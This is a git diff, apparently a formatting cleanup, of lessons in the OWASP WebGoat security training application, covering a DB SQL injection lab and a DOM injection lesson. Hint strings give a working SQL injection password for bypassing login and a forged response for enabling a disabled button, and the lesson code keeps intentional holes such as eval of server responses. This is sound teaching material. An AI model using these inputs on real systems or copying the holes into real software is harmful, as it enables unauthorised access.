+		registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+		registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
 	}
 
-	return instructions;
-    }
-
-    public void handleRequest(WebSession s)
-    {
-	if (s.getLessonSession(this) == null)
-	    s.openLessonSession(this);
-
-	String requestedActionName = null;
-	try
+	/**
+	 * Gets the category attribute of the CrossSiteScripting object
+	 * 
+	 * @return The category value
+	 */
+	public Category getDefaultCategory()
 	{
-	    requestedActionName = s.getParser().getStringParameter("action");
+		return Category.INJECTION;
 	}
-	catch (ParameterNotFoundException pnfe)
+
+	/**
+	 * Gets the hints attribute of the DirectoryScreen object
+	 * 
+	 * @return The hints value
+	 */
+	protected List<String> getHints(WebSession s)
 	{
-	    // Let them eat login page.
-	    requestedActionName = LOGIN_ACTION;
+		List<String> hints = new ArrayList<String>();
+		hints.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+		hints
+				.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+						+ "stmt  := 'SELECT USERID FROM EMPLOYEE WHERE USERID = ' || v_id || ' AND PASSWORD = ''' || v_password || '''';<br>"
+						+ "EXECUTE IMMEDIATE stmt INTO v_userid;");
+		hints
+				.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
+						+ "Remember: You need to end up with a SQL statement that only returns one row, since we are using an INTO clause");
+
+		// Stage 1
+		hints.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
+		hints.add("Try entering a password of [ ' OR userid=112 OR password=' ].");
+
+		// Stage 2
+		hints.add("Change the Stored procedure to use bind variables.");
+
+		return hints;
 	}
 
-	if (requestedActionName != null)
-	{
-	    try
-	    {
-		LessonAction action = getAction(requestedActionName);
-		if (action != null)
-		{
-		    //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName());
-		    if (!action.requiresAuthentication()
-			    || action.isAuthenticated(s))
-		    {
-			action.handleRequest(s);
-			//setCurrentAction(s, action.getNextPage(s));
-		    }
-		}
-		else
-		    setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ParameterNotFoundException pnfe)
-	    {
-		System.out.println("Missing parameter");
-		pnfe.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (ValidationException ve)
-	    {
-		System.out.println("Validation failed");
-		ve.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	    catch (UnauthenticatedException ue)
-	    {
-		s.setMessage("Login failed");
-		System.out.println("Authentication failure");
-		ue.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		s.setMessage("You are not authorized to perform this function");
-		System.out.println("Authorization failure");
-		ue2.printStackTrace();
-	    }
-	    catch (Exception e)
-	    {
-		// All other errors send the user to the generic error page
-		System.out.println("handleRequest() error");
-		e.printStackTrace();
-		setCurrentAction(s, ERROR_ACTION);
-	    }
-	}
-
-	// All this does for this lesson is ensure that a non-null content exists.
-	setContent(new ElementContainer());
-    }
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the CrossSiteScripting object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "LAB: DB SQL Injection";
-    }
-
 	@Override
-	protected boolean getDefaultHidden() {
+	public String[] getStages()
+	{
+		if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 };
+		return new String[] { STAGE1 };
+	}
+
+	/**
+	 * Gets the instructions attribute of the ParameterInjection object
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "";
+
+		if (!getLessonTracker(s).getCompleted())
+		{
+			String stage = getStage(s);
+			if (STAGE1.equals(stage))
+			{
+				instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
+						+ "The goal here is to login as the user " + PRIZE_EMPLOYEE_NAME
+						+ ", who is in the Admin group.  "
+						+ "You do not have the password, but the form is SQL injectable. "
+						+ "View the EMPLOYEE_LOGIN stored procedure and see if you can "
+						+ "determine why the exploit exists.";
+			}
+			else if (STAGE2.equals(stage))
+			{
+				instructions = "Stage 2: Use bind variables.<br>"
+						+ "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database "
+						+ "to use bind variables, rather than string concatenation. "
+						+ "Repeat the SQL Injection attack. Verify that the attack is no longer effective.";
+			}
+		}
+
+		return instructions;
+	}
+
+	public void handleRequest(WebSession s)
+	{
+		if (s.getLessonSession(this) == null) s.openLessonSession(this);
+
+		String requestedActionName = null;
+		try
+		{
+			requestedActionName = s.getParser().getStringParameter("action");
+		} catch (ParameterNotFoundException pnfe)
+		{
+			// Let them eat login page.
+			requestedActionName = LOGIN_ACTION;
+		}
+
+		if (requestedActionName != null)
+		{
+			try
+			{
+				LessonAction action = getAction(requestedActionName);
+				if (action != null)
+				{
+					// System.out.println("CrossSiteScripting.handleRequest() dispatching to: " +
+					// action.getActionName());
+					if (!action.requiresAuthentication() || action.isAuthenticated(s))
+					{
+						action.handleRequest(s);
+						// setCurrentAction(s, action.getNextPage(s));
+					}
+				}
+				else
+					setCurrentAction(s, ERROR_ACTION);
+			} catch (ParameterNotFoundException pnfe)
+			{
+				System.out.println("Missing parameter");
+				pnfe.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (ValidationException ve)
+			{
+				System.out.println("Validation failed");
+				ve.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			} catch (UnauthenticatedException ue)
+			{
+				s.setMessage("Login failed");
+				System.out.println("Authentication failure");
+				ue.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				s.setMessage("You are not authorized to perform this function");
+				System.out.println("Authorization failure");
+				ue2.printStackTrace();
+			} catch (Exception e)
+			{
+				// All other errors send the user to the generic error page
+				System.out.println("handleRequest() error");
+				e.printStackTrace();
+				setCurrentAction(s, ERROR_ACTION);
+			}
+		}
+
+		// All this does for this lesson is ensure that a non-null content exists.
+		setContent(new ElementContainer());
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	/**
+	 * Gets the title attribute of the CrossSiteScripting object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "LAB: DB SQL Injection";
+	}
+
+	@Override
+	protected boolean getDefaultHidden()
+	{
 		String driver = getWebgoatContext().getDatabaseDriver();
-		boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds"));
+		boolean hidden = !(driver.contains("oracle") || driver.contains("jtds"));
 		return hidden;
 	}
-    
+
 }
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
index d94953ce9..1bcabcb76 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons.DBSQLInjection;
 
 import java.sql.CallableStatement;
@@ -7,7 +8,6 @@ import java.sql.Statement;
 import java.sql.Types;
 import java.util.List;
 import java.util.Vector;
-
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
@@ -18,231 +18,209 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Login extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-
-    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
-	    LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    ValidationException
-    {
-	//System.out.println("Login.handleRequest()");
-	getLesson().setCurrentAction(s, getActionName());
-
-	List employees = getAllEmployees(s);
-	setSessionAttribute(s, getLessonName() + "."
-		+ DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees);
-
-	String employeeId = null;
-	try
+	public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    employeeId = s.getParser().getStringParameter(
-		    DBSQLInjection.EMPLOYEE_ID);
-	    String password = s.getParser().getRawParameter(
-		    DBSQLInjection.PASSWORD);
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
+	}
 
-	    // Attempt authentication
-	    boolean authenticated = login(s, employeeId, password);
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException
+	{
+		// System.out.println("Login.handleRequest()");
+		getLesson().setCurrentAction(s, getActionName());
 
-	    if (authenticated)
-	    {
-		// Execute the chained Action if authentication succeeded.
+		List employees = getAllEmployees(s);
+		setSessionAttribute(s, getLessonName() + "." + DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees);
+
+		String employeeId = null;
 		try
 		{
-		    chainedAction.handleRequest(s);
-		}
-		catch (UnauthenticatedException ue1)
-		{
-		    System.out.println("Internal server error");
-		    ue1.printStackTrace();
-		}
-		catch (UnauthorizedException ue2)
-		{
-		    System.out.println("Internal server error");
-		    ue2.printStackTrace();
-		}
-	    }
-	    else
-		s.setMessage("Login failed");
+			employeeId = s.getParser().getStringParameter(DBSQLInjection.EMPLOYEE_ID);
+			String password = s.getParser().getRawParameter(DBSQLInjection.PASSWORD);
 
-	}
-	catch (ParameterNotFoundException pnfe)
-	{
-	    // No credentials offered, so we log them out
-	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
-		    Boolean.FALSE);
-	}
-    }
+			// Attempt authentication
+			boolean authenticated = login(s, employeeId, password);
 
-
-    public String getNextPage(WebSession s)
-    {
-	String nextPage = DBSQLInjection.LOGIN_ACTION;
-
-	if (isAuthenticated(s))
-	    nextPage = chainedAction.getNextPage(s);
-
-	return nextPage;
-
-    }
-
-
-    public boolean requiresAuthentication()
-    {
-	return false;
-    }
-
-
-    public boolean login(WebSession s, String userId, String password)
-    {
-	boolean authenticated = false;
-
-	try
-	{
-	    String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh!
-	    
-	    try
-	    {
-			CallableStatement statement = WebSession.getConnection(s)
-				.prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE,
-					ResultSet.CONCUR_READ_ONLY);
-			statement.registerOutParameter(1, Types.INTEGER);
-			statement.setInt(2, Integer.parseInt(userId));
-			statement.setString(3, password);
-			statement.execute();
-
-			int rows = statement.getInt(1); 
-			if (rows > 0) {
-			    setSessionAttribute(s,
-				    getLessonName() + ".isAuthenticated", Boolean.TRUE);
-			    setSessionAttribute(s, getLessonName() + "."
-				    + DBSQLInjection.USER_ID, userId);
-			    authenticated = true;
-			    if (DBSQLInjection.STAGE1.equals(getStage(s)) && 
-			    		DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId))
-			    {
-			    	setStageComplete(s, DBSQLInjection.STAGE1);
-			    }
-			} else {
-				
-				if (DBSQLInjection.STAGE2.equals(getStage(s)))
+			if (authenticated)
+			{
+				// Execute the chained Action if authentication succeeded.
+				try
 				{
-					try 
-					{
-						String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }";
-						statement = WebSession.getConnection(s)
-							.prepareCall(call2, ResultSet.TYPE_SCROLL_INSENSITIVE,
-								ResultSet.CONCUR_READ_ONLY);
-						statement.registerOutParameter(1, Types.INTEGER);
-						statement.setInt(2, Integer.parseInt(userId));
-						statement.setString(3, password);
-						statement.execute();
-						
-						rows = statement.getInt(1);
-						if (rows > 0)
-							setStageComplete(s, DBSQLInjection.STAGE2);
-					}
-					catch (SQLException sqle2){}
+					chainedAction.handleRequest(s);
+				} catch (UnauthenticatedException ue1)
+				{
+					System.out.println("Internal server error");
+					ue1.printStackTrace();
+				} catch (UnauthorizedException ue2)
+				{
+					System.out.println("Internal server error");
+					ue2.printStackTrace();
 				}
 			}
-	    }
-	    catch (SQLException sqle)
-	    {
-			s.setMessage("Error logging in: " + sqle.getLocalizedMessage());
-			sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error logging in: " + e.getLocalizedMessage());
-	    e.printStackTrace();
-	}
+			else
+				s.setMessage("Login failed");
 
-	//System.out.println("Lesson login result: " + authenticated);
-	return authenticated;
-    }
-
-    public List getAllEmployees(WebSession s)
-    {
-	List<EmployeeStub> employees = new Vector<EmployeeStub>();
-
-	// Query the database for all roles the given employee belongs to
-	// Query the database for all employees "owned" by these roles
-
-	try
-	{
-	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
-		    + "where employee.userid=roles.userid";
-
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		answer_results.beforeFirst();
-		while (answer_results.next())
+		} catch (ParameterNotFoundException pnfe)
 		{
-		    int employeeId = answer_results.getInt("userid");
-		    String firstName = answer_results.getString("first_name");
-		    String lastName = answer_results.getString("last_name");
-		    String role = answer_results.getString("role");
-		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
-			    lastName, role);
-		    employees.add(stub);
+			// No credentials offered, so we log them out
+			setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE);
 		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employees");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employees");
-	    e.printStackTrace();
 	}
 
-	return employees;
-    }
+	public String getNextPage(WebSession s)
+	{
+		String nextPage = DBSQLInjection.LOGIN_ACTION;
+
+		if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s);
+
+		return nextPage;
+
+	}
+
+	public boolean requiresAuthentication()
+	{
+		return false;
+	}
+
+	public boolean login(WebSession s, String userId, String password)
+	{
+		boolean authenticated = false;
+
+		try
+		{
+			String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh!
+
+			try
+			{
+				CallableStatement statement = WebSession.getConnection(s)
+						.prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				statement.registerOutParameter(1, Types.INTEGER);
+				statement.setInt(2, Integer.parseInt(userId));
+				statement.setString(3, password);
+				statement.execute();
+
+				int rows = statement.getInt(1);
+				if (rows > 0)
+				{
+					setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE);
+					setSessionAttribute(s, getLessonName() + "." + DBSQLInjection.USER_ID, userId);
+					authenticated = true;
+					if (DBSQLInjection.STAGE1.equals(getStage(s))
+							&& DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId))
+					{
+						setStageComplete(s, DBSQLInjection.STAGE1);
+					}
+				}
+				else
+				{
+
+					if (DBSQLInjection.STAGE2.equals(getStage(s)))
+					{
+						try
+						{
+							String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }";
+							statement = WebSession.getConnection(s).prepareCall(call2,
+																				ResultSet.TYPE_SCROLL_INSENSITIVE,
+																				ResultSet.CONCUR_READ_ONLY);
+							statement.registerOutParameter(1, Types.INTEGER);
+							statement.setInt(2, Integer.parseInt(userId));
+							statement.setString(3, password);
+							statement.execute();
+
+							rows = statement.getInt(1);
+							if (rows > 0) setStageComplete(s, DBSQLInjection.STAGE2);
+						} catch (SQLException sqle2)
+						{
+						}
+					}
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error logging in: " + sqle.getLocalizedMessage());
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error logging in: " + e.getLocalizedMessage());
+			e.printStackTrace();
+		}
+
+		// System.out.println("Lesson login result: " + authenticated);
+		return authenticated;
+	}
+
+	public List getAllEmployees(WebSession s)
+	{
+		List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+		// Query the database for all roles the given employee belongs to
+		// Query the database for all employees "owned" by these roles
+
+		try
+		{
+			String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+					+ "where employee.userid=roles.userid";
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				answer_results.beforeFirst();
+				while (answer_results.next())
+				{
+					int employeeId = answer_results.getInt("userid");
+					String firstName = answer_results.getString("first_name");
+					String lastName = answer_results.getString("last_name");
+					String role = answer_results.getString("role");
+					EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role);
+					employees.add(stub);
+				}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employees");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employees");
+			e.printStackTrace();
+		}
+
+		return employees;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
index 45faa4561..d0d80a185 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.PrintWriter;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -16,175 +16,156 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    October 28, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created October 28, 2006
  */
 
 public class DOMInjection extends LessonAdapter
 {
 
-    private final static Integer DEFAULT_RANKING = new Integer(10);
+	private final static Integer DEFAULT_RANKING = new Integer(10);
 
-    private final static String KEY = "key";
+	private final static String KEY = "key";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    protected Element createContent(WebSession s)
-    {
-
-	String key = "K1JFWP8BSO8HI52LNPQS8F5L01N";
-	ElementContainer ec = new ElementContainer();
-
-	try
+	protected Element createContent(WebSession s)
 	{
-	    String userKey = s.getParser().getRawParameter(KEY, "");
-	    String fromAJAX = s.getParser().getRawParameter("from", "");
-	    if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0
-		    && userKey.equals(key))
-	    {
-		s.getResponse().setContentType("text/html");
-		s.getResponse().setHeader("Cache-Control", "no-cache");
-		PrintWriter out = new PrintWriter(s.getResponse()
-			.getOutputStream());
-		out.print("document.forms[0].SUBMIT.disabled = false;");
-		out.flush();
-		out.close();
+
+		String key = "K1JFWP8BSO8HI52LNPQS8F5L01N";
+		ElementContainer ec = new ElementContainer();
+
+		try
+		{
+			String userKey = s.getParser().getRawParameter(KEY, "");
+			String fromAJAX = s.getParser().getRawParameter("from", "");
+			if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 && userKey.equals(key))
+			{
+				s.getResponse().setContentType("text/html");
+				s.getResponse().setHeader("Cache-Control", "no-cache");
+				PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
+				out.print("document.forms[0].SUBMIT.disabled = false;");
+				out.flush();
+				out.close();
+				return ec;
+			}
+			if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
+			{
+				makeSuccess(s);
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		String lineSep = System.getProperty("line.separator");
+		String script = "<script>" + lineSep + "function validate() {" + lineSep
+				+ "var keyField = document.getElementById('key');" + lineSep + "var url = '" + getLink()
+				+ "&from=ajax&key=' + encodeURIComponent(keyField.value);" + lineSep
+				+ "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();" + lineSep
+				+ "} else if (window.ActiveXObject) {" + lineSep + "req = new ActiveXObject('Microsoft.XMLHTTP');"
+				+ lineSep + "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
+				+ "   req.onreadystatechange = callback;" + lineSep + "   req.send(null);" + lineSep + "}" + lineSep
+				+ "function callback() {" + lineSep + "    if (req.readyState == 4) { " + lineSep
+				+ "        if (req.status == 200) { " + lineSep + "            var message = req.responseText;"
+				+ lineSep + "			 eval(message);" + lineSep + "        }}}" + lineSep + "</script>" + lineSep;
+
+		ec.addElement(new StringElement(script));
+		ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:")));
+		ec.addElement(new BR()
+				.addElement("Please enter the license key that was emailed to you to start using the application."));
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("70%").setAlign("center");
+
+		TR tr = new TR();
+		tr.addElement(new TD(new StringElement("License Key: ")));
+
+		Input input1 = new Input(Input.TEXT, KEY, "");
+		input1.addAttribute("onkeyup", "validate();");
+		tr.addElement(new TD(input1));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD("&nbsp;").setColSpan(2));
+
+		t1.addElement(tr);
+
+		tr = new TR();
+		Input b = new Input();
+		b.setType(Input.SUBMIT);
+		b.setValue("Activate!");
+		b.setName("SUBMIT");
+		b.setDisabled(true);
+		tr.addElement(new TD("&nbsp;"));
+		tr.addElement(new TD(b));
+
+		t1.addElement(tr);
+		ec.addElement(t1);
+
 		return ec;
-	    }
-	    if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
-	    {
-		makeSuccess(s);
-	    }
 	}
-	catch (Exception e)
+
+	public Element getCredits()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
 	}
 
-	String lineSep = System.getProperty("line.separator");
-	String script = "<script>" + lineSep + "function validate() {"
-		+ lineSep + "var keyField = document.getElementById('key');"
-		+ lineSep + "var url = '" + getLink() 
-		+ "&from=ajax&key=' + encodeURIComponent(keyField.value);"
-		+ lineSep + "if (typeof XMLHttpRequest != 'undefined') {"
-		+ lineSep + "req = new XMLHttpRequest();" + lineSep
-		+ "} else if (window.ActiveXObject) {" + lineSep
-		+ "req = new ActiveXObject('Microsoft.XMLHTTP');" + lineSep
-		+ "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
-		+ "   req.onreadystatechange = callback;" + lineSep
-		+ "   req.send(null);" + lineSep + "}" + lineSep
-		+ "function callback() {" + lineSep
-		+ "    if (req.readyState == 4) { " + lineSep
-		+ "        if (req.status == 200) { " + lineSep
-		+ "            var message = req.responseText;" + lineSep
-		+ "			 eval(message);" + lineSep + "        }}}" + lineSep
-		+ "</script>" + lineSep;
+	protected Category getDefaultCategory()
+	{
 
-	ec.addElement(new StringElement(script));
-	ec.addElement(new BR().addElement(new H1()
-		.addElement("Welcome to WebGoat Registration Page:")));
-	ec
-		.addElement(new BR()
-			.addElement("Please enter the license key that was emailed to you to start using the application."));
-	ec.addElement(new BR());
-	ec.addElement(new BR());
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
-		.setWidth("70%").setAlign("center");
+		return Category.AJAX_SECURITY;
+	}
 
-	TR tr = new TR();
-	tr.addElement(new TD(new StringElement("License Key: ")));
+	protected Integer getDefaultRanking()
+	{
 
-	Input input1 = new Input(Input.TEXT, KEY, "");
-	input1.addAttribute("onkeyup", "validate();");
-	tr.addElement(new TD(input1));
-	t1.addElement(tr);
+		return DEFAULT_RANKING;
+	}
 
-	tr = new TR();
-	tr.addElement(new TD("&nbsp;").setColSpan(2));
+	protected List<String> getHints(WebSession s)
+	{
 
-	t1.addElement(tr);
+		List<String> hints = new ArrayList<String>();
+		hints.add("This page is using XMLHTTP to comunicate with the server.");
+		hints.add("Try to find a way to inject the DOM to enable the Activate button.");
+		hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
+		return hints;
+	}
 
-	tr = new TR();
-	Input b = new Input();
-	b.setType(Input.SUBMIT);
-	b.setValue("Activate!");
-	b.setName("SUBMIT");
-	b.setDisabled(true);
-	tr.addElement(new TD("&nbsp;"));
-	tr.addElement(new TD(b));
-
-	t1.addElement(tr);
-	ec.addElement(t1);
-
-	return ec;
-    }
-
-
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
-
-
-    protected Category getDefaultCategory()
-    {
-
-	return Category.AJAX_SECURITY;
-    }
-
-
-    protected Integer getDefaultRanking()
-    {
-
-	return DEFAULT_RANKING;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-
-	List<String> hints = new ArrayList<String>();
-	hints.add("This page is using XMLHTTP to comunicate with the server.");
-	hints.add("Try to find a way to inject the DOM to enable the Activate button.");
-	hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;");
-	return hints;
-    }
-
-
-    public String getTitle()
-    {
-	return "DOM Injection";
-    }
+	public String getTitle()
+	{
+		return "DOM Injection";
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java
index ee9526357..332ae8f2f 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.BufferedReader;
@@ -6,7 +7,6 @@ import java.io.FileReader;
 import java.io.IOException;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,31 +18,40 @@ import org.apache.ecs.html.Input;
